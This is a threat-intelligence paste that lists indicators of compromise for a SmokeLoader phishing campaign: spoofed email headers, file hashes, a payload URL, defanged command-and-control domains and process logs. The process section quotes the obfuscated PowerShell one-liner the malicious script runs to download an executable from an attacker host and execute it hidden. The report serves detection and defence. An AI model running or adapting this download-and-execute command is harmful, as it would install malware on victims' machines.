API tools faq
paste
VRad

#smokeloader_040523

VRad
May 5th, 2023 (edited)
120
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.76 KB | None | 0 0
raw download clone embed print report
  1. #IOC #OptiData #VR #smokeloader #ZIP #JS
  2.  
  3. https://pastebin.com/RDVXCe0J
  4.  
  5. previous_contact:
  6. https://pastebin.com/QpG70u8T
  7. https://pastebin.com/BJzcXqkK
  8. https://pastebin.com/kBW7nkZ5
  9. https://pastebin.com/Z7zq0YkW
  10. https://pastebin.com/b8PkhMyN
  11. https://pastebin.com/hkskwKvc
  12. https://pastebin.com/JmthzrL4
  13. https://pastebin.com/1scwT0f8
  14. https://pastebin.com/MP3kCSSh
  15.  
  16. FAQ:
  17. https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/
  18. https://research.checkpoint.com/2019-resurgence-of-smokeloader/
  19.  
  20. attack_vector
  21. --------------
  22. email attach .zip? > JS > WSH > PowerShell > GET 1URL > exe
  23.  
  24.  
  25. # # # # # # # #
  26. email_headers
  27. # # # # # # # #
  28. Return-Path: <prvs=14880d1fa8=inbox6@dl.kr-admin.gov.ua>
  29. Received: from kr-admin.gov.ua (mail.kr-admin.gov.ua [195.62.15.59])
  30. Received: from [127.0.0.1] by kr-admin.gov.ua (MDaemon PRO v9.6.1)
  31. Reply-To: stroybuts@ukr.net
  32. From: inbox6@dl.kr-admin.gov.ua
  33. Subject: рахунок від 02.05.2023
  34. Message-Id: <7D5F7EBF-2F2B-D454-AC28-B86320169DD9@dl.kr-admin.gov.ua>
  35. Date: Thu, 4 May 2023 07:23:20 +0300
  36. X-Mailer: iPad Mail (13E238)
  37. X-Authenticated-Sender: inbox6@dl.kr-admin.gov.ua
  38.  
  39.  
  40. # # # # # # # #
  41. files
  42. # # # # # # # #
  43. SHA-256 352974cfdf1a7e182180f8c813a159ae44bb35268d76fae91ab64139be9200bd
  44. File name pax_2023_AB1058.zip [ Zip archive data, at least v2.0 to extract ]
  45. File size 955.61 KB (978548 bytes)
  46.  
  47. SHA-256 3c4440dde25ead7074bf3bf90aed31844310c3f1da90ff7e20922fad4c3eab25
  48. File name pax_2023_AB1058.pdf [ PDF document, version 1.7 ]
  49. File size 1.13 MB (1180511 bytes)
  50.  
  51. SHA-256 f4e72685fb3efa5bad200451d36c7d1e72a94515c515bdbb09c00254dca289ea
  52. File name pax_2023_AB1058..js [ JavaScript ]
  53. File size 28.29 KB (28967 bytes)
  54.  
  55. SHA-256 cd0226a2b9c38ab99f2bbe4461b7fc9d4b07faafbe1ccc53d92bf08d1903a8ae
  56. File name portable.exe (TempgEq94.exe) [ PE32 executable for MS Windows ]
  57. File size 263.50 KB (269824 bytes)
  58.  
  59.  
  60. # # # # # # # #
  61. activity
  62. # # # # # # # #
  63.  
  64. PL_SCR http://homospoison{ .ru/one/portable.exe [193.106.175.177]
  65.  
  66.  
  67. C2
  68.  
  69. http://coudzoom{ .ru/
  70. http://balkimotion{ .ru/
  71. http://ligaspace{ .ru/
  72. http://ipodromlan{ .ru/
  73. http://redport80{ .ru/
  74. http://superboler{ .com/
  75. http://lamazone{ .site/
  76. http://criticalosl{ .tech/
  77. http://3dstore{ .pro/
  78. http://humanitarydp{ .ug/
  79. http://shopersport{ .ru/
  80. http://sindoproperty{ .org/
  81. http://maximprofile{ .net/
  82. http://zaliphone{ .com/
  83.  
  84.  
  85.  
  86. netwrk
  87. --------------
  88. 193.106.175.177 homospoison.ru 80 HTTP GET /one/portable.exe HTTP/1.1 Google Chrome
  89.  
  90.  
  91. comp
  92. --------------
  93. powershell.exe 193.106.175.177 homospoison.ru
  94.  
  95.  
  96. proc
  97. --------------
  98. "C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\pax_2023_AB1058..js"
  99. "C:\Windows\System32\cmd.exe" /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://homospoison{ .ru/one/portable.exe','%temp%gEq94.exe'); & %temp%gEq94.exe & ZJHYOcunksxSdyp
  100. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://homospoison{ .ru/one/portable.exe','C:\Users\support\AppData\Local\TempgEq94.exe');
  101. C:\Users\support\AppData\Local\TempgEq94.exe
  102.  
  103.  
  104. persist
  105. --------------
  106. n/a
  107.  
  108.  
  109. drop
  110. --------------
  111. C:\Users\%username%\AppData\Local\TempgEq94.exe
  112.  
  113.  
  114. # # # # # # # #
  115. additional info
  116. # # # # # # # #
  117.  
  118.  
  119. TTPs: Query Registry System Information Discovery
  120. wscript.exe \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation
  121.  
  122. TTPs: Email Collection
  123. explorer.exe \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
  124. \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  125. \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  126.  
  127.  
  128. # # # # # # # #
  129. VT & Intezer
  130. # # # # # # # #
  131. https://www.virustotal.com/gui/file/352974cfdf1a7e182180f8c813a159ae44bb35268d76fae91ab64139be9200bd/details
  132. https://www.virustotal.com/gui/file/3c4440dde25ead7074bf3bf90aed31844310c3f1da90ff7e20922fad4c3eab25/details
  133. https://www.virustotal.com/gui/file/f4e72685fb3efa5bad200451d36c7d1e72a94515c515bdbb09c00254dca289ea/details
  134. https://www.virustotal.com/gui/file/cd0226a2b9c38ab99f2bbe4461b7fc9d4b07faafbe1ccc53d92bf08d1903a8ae/details
  135. https://analyze.intezer.com/analyses/27e7086e-09d8-4998-9e25-06c41e34a42d
  136.  
  137. VR
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!